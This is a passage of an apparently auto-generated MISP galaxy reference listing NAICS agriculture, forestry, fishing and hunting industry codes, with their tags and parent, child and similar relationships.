  • similar: misp-galaxy:naics="11112" with estimative-language:likelihood-probability="likely"

11113

Dry Pea and Bean Farming

The tag is: misp-galaxy:naics="11113"

11113 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111130" with estimative-language:likelihood-probability="likely"

111130

Dry Pea and Bean Farming

The tag is: misp-galaxy:naics="111130"

111130 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11113" with estimative-language:likelihood-probability="likely"

11114

Wheat Farming

The tag is: misp-galaxy:naics="11114"

11114 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111140" with estimative-language:likelihood-probability="likely"

111140

Wheat Farming

The tag is: misp-galaxy:naics="111140"

111140 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11114" with estimative-language:likelihood-probability="likely"

11115

Corn Farming

The tag is: misp-galaxy:naics="11115"

11115 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111150" with estimative-language:likelihood-probability="likely"

111150

Corn Farming

The tag is: misp-galaxy:naics="111150"

111150 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11115" with estimative-language:likelihood-probability="likely"

11116

Rice Farming

The tag is: misp-galaxy:naics="11116"

11116 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111160" with estimative-language:likelihood-probability="likely"

111160

Rice Farming

The tag is: misp-galaxy:naics="111160"

111160 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11116" with estimative-language:likelihood-probability="likely"

11119

Other Grain Farming

The tag is: misp-galaxy:naics="11119"

11119 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

111191

Oilseed and Grain Combination Farming

The tag is: misp-galaxy:naics="111191"

111191 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

111199

All Other Grain Farming

The tag is: misp-galaxy:naics="111199"

111199 has relationships with:

  • child-of: misp-galaxy:naics="1111" with estimative-language:likelihood-probability="likely"

1112

Vegetable and Melon Farming

The tag is: misp-galaxy:naics="1112"

1112 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111219" with estimative-language:likelihood-probability="likely"

11121

Vegetable and Melon Farming

The tag is: misp-galaxy:naics="11121"

11121 has relationships with:

  • child-of: misp-galaxy:naics="1112" with estimative-language:likelihood-probability="likely"

111211

Potato Farming

The tag is: misp-galaxy:naics="111211"

111211 has relationships with:

  • child-of: misp-galaxy:naics="1112" with estimative-language:likelihood-probability="likely"

111219

Other Vegetable (except Potato) and Melon Farming

The tag is: misp-galaxy:naics="111219"

111219 has relationships with:

  • child-of: misp-galaxy:naics="1112" with estimative-language:likelihood-probability="likely"

1113

Fruit and Tree Nut Farming

The tag is: misp-galaxy:naics="1113"

1113 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111339" with estimative-language:likelihood-probability="likely"

11131

Orange Groves

The tag is: misp-galaxy:naics="11131"

11131 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111310" with estimative-language:likelihood-probability="likely"

111310

Orange Groves

The tag is: misp-galaxy:naics="111310"

111310 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11131" with estimative-language:likelihood-probability="likely"

11132

Citrus (except Orange) Groves

The tag is: misp-galaxy:naics="11132"

11132 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111320" with estimative-language:likelihood-probability="likely"

111320

Citrus (except Orange) Groves

The tag is: misp-galaxy:naics="111320"

111320 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11132" with estimative-language:likelihood-probability="likely"

11133

Noncitrus Fruit and Tree Nut Farming

The tag is: misp-galaxy:naics="11133"

11133 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111331

Apple Orchards

The tag is: misp-galaxy:naics="111331"

111331 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111332

Grape Vineyards

The tag is: misp-galaxy:naics="111332"

111332 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111333

Strawberry Farming

The tag is: misp-galaxy:naics="111333"

111333 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111334

Berry (except Strawberry) Farming

The tag is: misp-galaxy:naics="111334"

111334 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111335

Tree Nut Farming

The tag is: misp-galaxy:naics="111335"

111335 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111336

Fruit and Tree Nut Combination Farming

The tag is: misp-galaxy:naics="111336"

111336 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

111339

Other Noncitrus Fruit Farming

The tag is: misp-galaxy:naics="111339"

111339 has relationships with:

  • child-of: misp-galaxy:naics="1113" with estimative-language:likelihood-probability="likely"

1114

Greenhouse, Nursery, and Floriculture Production

The tag is: misp-galaxy:naics="1114"

1114 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111419" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111422" with estimative-language:likelihood-probability="likely"

11141

Food Crops Grown Under Cover

The tag is: misp-galaxy:naics="11141"

11141 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

111411

Mushroom Production

The tag is: misp-galaxy:naics="111411"

111411 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

111419

Other Food Crops Grown Under Cover

The tag is: misp-galaxy:naics="111419"

111419 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

11142

Nursery and Floriculture Production

The tag is: misp-galaxy:naics="11142"

11142 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

111421

Nursery and Tree Production

The tag is: misp-galaxy:naics="111421"

111421 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

111422

Floriculture Production

The tag is: misp-galaxy:naics="111422"

111422 has relationships with:

  • child-of: misp-galaxy:naics="1114" with estimative-language:likelihood-probability="likely"

1119

Other Crop Farming

The tag is: misp-galaxy:naics="1119"

1119 has relationships with:

  • child-of: misp-galaxy:naics="111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11193" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11194" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="111998" with estimative-language:likelihood-probability="likely"

11191

Tobacco Farming

The tag is: misp-galaxy:naics="11191"

11191 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111910" with estimative-language:likelihood-probability="likely"

111910

Tobacco Farming

The tag is: misp-galaxy:naics="111910"

111910 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11191" with estimative-language:likelihood-probability="likely"

11192

Cotton Farming

The tag is: misp-galaxy:naics="11192"

11192 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111920" with estimative-language:likelihood-probability="likely"

111920

Cotton Farming

The tag is: misp-galaxy:naics="111920"

111920 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11192" with estimative-language:likelihood-probability="likely"

11193

Sugarcane Farming

The tag is: misp-galaxy:naics="11193"

11193 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111930" with estimative-language:likelihood-probability="likely"

111930

Sugarcane Farming

The tag is: misp-galaxy:naics="111930"

111930 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11193" with estimative-language:likelihood-probability="likely"

11194

Hay Farming

The tag is: misp-galaxy:naics="11194"

11194 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="111940" with estimative-language:likelihood-probability="likely"

111940

Hay Farming

The tag is: misp-galaxy:naics="111940"

111940 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11194" with estimative-language:likelihood-probability="likely"

11199

All Other Crop Farming

The tag is: misp-galaxy:naics="11199"

11199 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

111991

Sugar Beet Farming

The tag is: misp-galaxy:naics="111991"

111991 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

111992

Peanut Farming

The tag is: misp-galaxy:naics="111992"

111992 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

111998

All Other Miscellaneous Crop Farming

The tag is: misp-galaxy:naics="111998"

111998 has relationships with:

  • child-of: misp-galaxy:naics="1119" with estimative-language:likelihood-probability="likely"

112

Animal Production and Aquaculture

The tag is: misp-galaxy:naics="112"

112 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

1121

Cattle Ranching and Farming

The tag is: misp-galaxy:naics="1121"

1121 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112130" with estimative-language:likelihood-probability="likely"

11211

Beef Cattle Ranching and Farming, including Feedlots

The tag is: misp-galaxy:naics="11211"

11211 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

112111

Beef Cattle Ranching and Farming

The tag is: misp-galaxy:naics="112111"

112111 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

112112

Cattle Feedlots

The tag is: misp-galaxy:naics="112112"

112112 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

11212

Dairy Cattle and Milk Production

The tag is: misp-galaxy:naics="11212"

11212 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112120" with estimative-language:likelihood-probability="likely"

112120

Dairy Cattle and Milk Production

The tag is: misp-galaxy:naics="112120"

112120 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11212" with estimative-language:likelihood-probability="likely"

11213

Dual-Purpose Cattle Ranching and Farming

The tag is: misp-galaxy:naics="11213"

11213 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112130" with estimative-language:likelihood-probability="likely"

112130

Dual-Purpose Cattle Ranching and Farming

The tag is: misp-galaxy:naics="112130"

112130 has relationships with:

  • child-of: misp-galaxy:naics="1121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11213" with estimative-language:likelihood-probability="likely"

1122

Hog and Pig Farming

The tag is: misp-galaxy:naics="1122"

1122 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112210" with estimative-language:likelihood-probability="likely"

11221

Hog and Pig Farming

The tag is: misp-galaxy:naics="11221"

11221 has relationships with:

  • child-of: misp-galaxy:naics="1122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112210" with estimative-language:likelihood-probability="likely"

112210

Hog and Pig Farming

The tag is: misp-galaxy:naics="112210"

112210 has relationships with:

  • child-of: misp-galaxy:naics="1122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11221" with estimative-language:likelihood-probability="likely"

1123

Poultry and Egg Production

The tag is: misp-galaxy:naics="1123"

1123 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11234" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11239" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112390" with estimative-language:likelihood-probability="likely"

11231

Chicken Egg Production

The tag is: misp-galaxy:naics="11231"

11231 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112310" with estimative-language:likelihood-probability="likely"

112310

Chicken Egg Production

The tag is: misp-galaxy:naics="112310"

112310 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11231" with estimative-language:likelihood-probability="likely"

11232

Broilers and Other Meat Type Chicken Production

The tag is: misp-galaxy:naics="11232"

11232 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112320" with estimative-language:likelihood-probability="likely"

112320

Broilers and Other Meat Type Chicken Production

The tag is: misp-galaxy:naics="112320"

112320 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11232" with estimative-language:likelihood-probability="likely"

11233

Turkey Production

The tag is: misp-galaxy:naics="11233"

11233 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112330" with estimative-language:likelihood-probability="likely"

112330

Turkey Production

The tag is: misp-galaxy:naics="112330"

112330 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11233" with estimative-language:likelihood-probability="likely"

11234

Poultry Hatcheries

The tag is: misp-galaxy:naics="11234"

11234 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112340" with estimative-language:likelihood-probability="likely"

112340

Poultry Hatcheries

The tag is: misp-galaxy:naics="112340"

112340 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11234" with estimative-language:likelihood-probability="likely"

11239

Other Poultry Production

The tag is: misp-galaxy:naics="11239"

11239 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112390" with estimative-language:likelihood-probability="likely"

112390

Other Poultry Production

The tag is: misp-galaxy:naics="112390"

112390 has relationships with:

  • child-of: misp-galaxy:naics="1123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11239" with estimative-language:likelihood-probability="likely"

1124

Sheep and Goat Farming

The tag is: misp-galaxy:naics="1124"

1124 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112420" with estimative-language:likelihood-probability="likely"

11241

Sheep Farming

The tag is: misp-galaxy:naics="11241"

11241 has relationships with:

  • child-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112410" with estimative-language:likelihood-probability="likely"

112410

Sheep Farming

The tag is: misp-galaxy:naics="112410"

112410 has relationships with:

  • child-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11241" with estimative-language:likelihood-probability="likely"

11242

Goat Farming

The tag is: misp-galaxy:naics="11242"

11242 has relationships with:

  • child-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112420" with estimative-language:likelihood-probability="likely"

112420

Goat Farming

The tag is: misp-galaxy:naics="112420"

112420 has relationships with:

  • child-of: misp-galaxy:naics="1124" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11242" with estimative-language:likelihood-probability="likely"

1125

Aquaculture

The tag is: misp-galaxy:naics="1125"

1125 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112519" with estimative-language:likelihood-probability="likely"

11251

Aquaculture

The tag is: misp-galaxy:naics="11251"

11251 has relationships with:

  • child-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

112511

Finfish Farming and Fish Hatcheries

The tag is: misp-galaxy:naics="112511"

112511 has relationships with:

  • child-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

112512

Shellfish Farming

The tag is: misp-galaxy:naics="112512"

112512 has relationships with:

  • child-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

112519

Other Aquaculture

The tag is: misp-galaxy:naics="112519"

112519 has relationships with:

  • child-of: misp-galaxy:naics="1125" with estimative-language:likelihood-probability="likely"

1129

Other Animal Production

The tag is: misp-galaxy:naics="1129"

1129 has relationships with:

  • child-of: misp-galaxy:naics="112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11293" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11299" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="112990" with estimative-language:likelihood-probability="likely"

11291

Apiculture

The tag is: misp-galaxy:naics="11291"

11291 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112910" with estimative-language:likelihood-probability="likely"

112910

Apiculture

The tag is: misp-galaxy:naics="112910"

112910 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11291" with estimative-language:likelihood-probability="likely"

11292

Horses and Other Equine Production

The tag is: misp-galaxy:naics="11292"

11292 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112920" with estimative-language:likelihood-probability="likely"

112920

Horses and Other Equine Production

The tag is: misp-galaxy:naics="112920"

112920 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11292" with estimative-language:likelihood-probability="likely"

11293

Fur-Bearing Animal and Rabbit Production

The tag is: misp-galaxy:naics="11293"

11293 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112930" with estimative-language:likelihood-probability="likely"

112930

Fur-Bearing Animal and Rabbit Production

The tag is: misp-galaxy:naics="112930"

112930 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11293" with estimative-language:likelihood-probability="likely"

11299

All Other Animal Production

The tag is: misp-galaxy:naics="11299"

11299 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="112990" with estimative-language:likelihood-probability="likely"

112990

All Other Animal Production

The tag is: misp-galaxy:naics="112990"

112990 has relationships with:

  • child-of: misp-galaxy:naics="1129" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11299" with estimative-language:likelihood-probability="likely"

113

Forestry and Logging

The tag is: misp-galaxy:naics="113"

113 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1133" with estimative-language:likelihood-probability="likely"

1131

Timber Tract Operations

The tag is: misp-galaxy:naics="1131"

1131 has relationships with:

  • child-of: misp-galaxy:naics="113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="113110" with estimative-language:likelihood-probability="likely"

11311

Timber Tract Operations

The tag is: misp-galaxy:naics="11311"

11311 has relationships with:

  • child-of: misp-galaxy:naics="1131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="113110" with estimative-language:likelihood-probability="likely"

113110

Timber Tract Operations

The tag is: misp-galaxy:naics="113110"

113110 has relationships with:

  • child-of: misp-galaxy:naics="1131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11311" with estimative-language:likelihood-probability="likely"

1132

Forest Nurseries and Gathering of Forest Products

The tag is: misp-galaxy:naics="1132"

1132 has relationships with:

  • child-of: misp-galaxy:naics="113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="113210" with estimative-language:likelihood-probability="likely"

11321

Forest Nurseries and Gathering of Forest Products

The tag is: misp-galaxy:naics="11321"

11321 has relationships with:

  • child-of: misp-galaxy:naics="1132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="113210" with estimative-language:likelihood-probability="likely"

113210

Forest Nurseries and Gathering of Forest Products

The tag is: misp-galaxy:naics="113210"

113210 has relationships with:

  • child-of: misp-galaxy:naics="1132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11321" with estimative-language:likelihood-probability="likely"

1133

Logging

The tag is: misp-galaxy:naics="1133"

1133 has relationships with:

  • child-of: misp-galaxy:naics="113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="113310" with estimative-language:likelihood-probability="likely"

11331

Logging

The tag is: misp-galaxy:naics="11331"

11331 has relationships with:

  • child-of: misp-galaxy:naics="1133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="113310" with estimative-language:likelihood-probability="likely"

113310

Logging

The tag is: misp-galaxy:naics="113310"

113310 has relationships with:

  • child-of: misp-galaxy:naics="1133" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11331" with estimative-language:likelihood-probability="likely"

114

Fishing, Hunting and Trapping

The tag is: misp-galaxy:naics="114"

114 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1142" with estimative-language:likelihood-probability="likely"

1141

Fishing

The tag is: misp-galaxy:naics="1141"

1141 has relationships with:

  • child-of: misp-galaxy:naics="114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114119" with estimative-language:likelihood-probability="likely"

11411

Fishing

The tag is: misp-galaxy:naics="11411"

11411 has relationships with:

  • child-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

114111

Finfish Fishing

The tag is: misp-galaxy:naics="114111"

114111 has relationships with:

  • child-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

114112

Shellfish Fishing

The tag is: misp-galaxy:naics="114112"

114112 has relationships with:

  • child-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

114119

Other Marine Fishing

The tag is: misp-galaxy:naics="114119"

114119 has relationships with:

  • child-of: misp-galaxy:naics="1141" with estimative-language:likelihood-probability="likely"

1142

Hunting and Trapping

The tag is: misp-galaxy:naics="1142"

1142 has relationships with:

  • child-of: misp-galaxy:naics="114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="114210" with estimative-language:likelihood-probability="likely"

11421

Hunting and Trapping

The tag is: misp-galaxy:naics="11421"

11421 has relationships with:

  • child-of: misp-galaxy:naics="1142" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="114210" with estimative-language:likelihood-probability="likely"

114210

Hunting and Trapping

The tag is: misp-galaxy:naics="114210"

114210 has relationships with:

  • child-of: misp-galaxy:naics="1142" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11421" with estimative-language:likelihood-probability="likely"

115

Support Activities for Agriculture and Forestry

The tag is: misp-galaxy:naics="115"

115 has relationships with:

  • child-of: misp-galaxy:naics="11" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

